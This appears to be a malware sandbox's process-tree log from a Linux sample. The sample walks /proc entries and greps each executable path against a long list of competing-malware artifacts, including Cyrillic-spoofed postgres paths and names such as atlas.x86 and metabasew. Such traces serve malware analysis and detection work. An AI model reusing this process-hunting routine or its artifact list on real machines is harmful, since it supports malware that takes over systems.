/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:826
-
-
/bin/grepgrep exe2⤵PID:829
-
-
/bin/lsls -latrh /proc/202⤵PID:828
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:831
-
-
/bin/grepgrep exe2⤵PID:834
-
-
/bin/lsls -latrh /proc/212⤵PID:833
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:836
-
-
/bin/grepgrep exe2⤵PID:839
-
-
/bin/lsls -latrh /proc/222⤵PID:838
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:841
-
-
/bin/grepgrep exe2⤵PID:844
-
-
/bin/lsls -latrh /proc/2202⤵PID:843
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:846
-
-
/bin/grepgrep exe2⤵PID:849
-
-
/bin/lsls -latrh /proc/232⤵PID:848
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:851
-
-
/bin/grepgrep exe2⤵PID:854
-
-
/bin/lsls -latrh /proc/2362⤵PID:853
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:856
-
-
/bin/grepgrep exe2⤵PID:859
-
-
/bin/lsls -latrh /proc/242⤵PID:858
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:861
-
-
/bin/grepgrep exe2⤵PID:864
-
-
/bin/lsls -latrh /proc/32⤵PID:863
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:866
-
-
/bin/grepgrep exe2⤵PID:869
-
-
/bin/lsls -latrh /proc/3242⤵PID:868
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:871
-
-
/bin/grepgrep exe2⤵PID:874
-
-
/bin/lsls -latrh /proc/3262⤵PID:873
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:876
-
-
/bin/grepgrep exe2⤵PID:879
-
-
/bin/lsls -latrh /proc/3422⤵PID:878
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:881
-
-
/bin/grepgrep exe2⤵PID:884
-
-
/bin/lsls -latrh /proc/3452⤵PID:883
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:886
-
-
/bin/grepgrep exe2⤵PID:889
-
-
/bin/lsls -latrh /proc/3492⤵PID:888
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:891
-
-
/bin/grepgrep exe2⤵PID:896
-
-
/bin/lsls -latrh /proc/362⤵PID:895
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:898
-
-
/bin/grepgrep exe2⤵PID:901
-
-
/bin/lsls -latrh /proc/372⤵PID:900
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:904
-
-
/bin/grepgrep exe2⤵PID:908
-
-
/bin/lsls -latrh /proc/3752⤵PID:907
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:910
-
-
/bin/grepgrep exe2⤵PID:914
-
-
/bin/lsls -latrh /proc/3772⤵PID:913
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:917
-
-
/bin/grepgrep exe2⤵PID:921
-
-
/bin/lsls -latrh /proc/3892⤵PID:920
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:924
-
-
/bin/lsls -latrh /proc/3932⤵PID:927
-
-
/bin/grepgrep exe2⤵PID:928
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:930
-
-
/bin/grepgrep exe2⤵PID:934
-
-
/bin/lsls -latrh /proc/42⤵PID:933
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:937
-
-
/bin/grepgrep exe2⤵PID:941
-
-
/bin/lsls -latrh /proc/52⤵PID:940
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:944
-
-
/bin/grepgrep exe2⤵PID:947
-
-
/bin/lsls -latrh /proc/62⤵PID:946
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:950
-
-
/bin/lsls -latrh /proc/6582⤵PID:953
-
-
/bin/grepgrep exe2⤵PID:954
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:957
-
-
/bin/grepgrep exe2⤵PID:961
-
-
/bin/lsls -latrh /proc/6612⤵PID:960
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:964
-
-
/bin/grepgrep exe2⤵PID:968
-
-
/bin/lsls -latrh /proc/6642⤵PID:967
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:970
-
-
/bin/grepgrep exe2⤵PID:974
-
-
/bin/lsls -latrh /proc/6652⤵PID:973
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:977
-
-
/bin/grepgrep exe2⤵PID:980
-
-
/bin/lsls -latrh /proc/672⤵PID:979
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:984
-
-
/bin/grepgrep exe2⤵PID:987
-
-
/bin/lsls -latrh /proc/6792⤵PID:986
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:990
-
-
/bin/lsls -latrh /proc/682⤵PID:993
-
-
/bin/grepgrep exe2⤵PID:994
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:996
-
-
/bin/lsls -latrh /proc/692⤵PID:999
-
-
/bin/grepgrep exe2⤵PID:1000
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1003
-
-
/bin/lsls -latrh /proc/6942⤵PID:1005
-
-
/bin/grepgrep exe2⤵PID:1006
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1010
-
-
/bin/grepgrep exe2⤵PID:1013
-
-
/bin/lsls -latrh /proc/6952⤵PID:1012
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1015
-
-
/bin/grepgrep exe2⤵PID:1019
-
-
/bin/lsls -latrh /proc/6992⤵PID:1018
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1024
-
-
/bin/grepgrep exe2⤵PID:1027
-
-
/bin/lsls -latrh /proc/72⤵PID:1026
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1030
-
-
/bin/grepgrep exe2⤵PID:1034
-
-
/bin/lsls -latrh /proc/7002⤵PID:1033
-
-
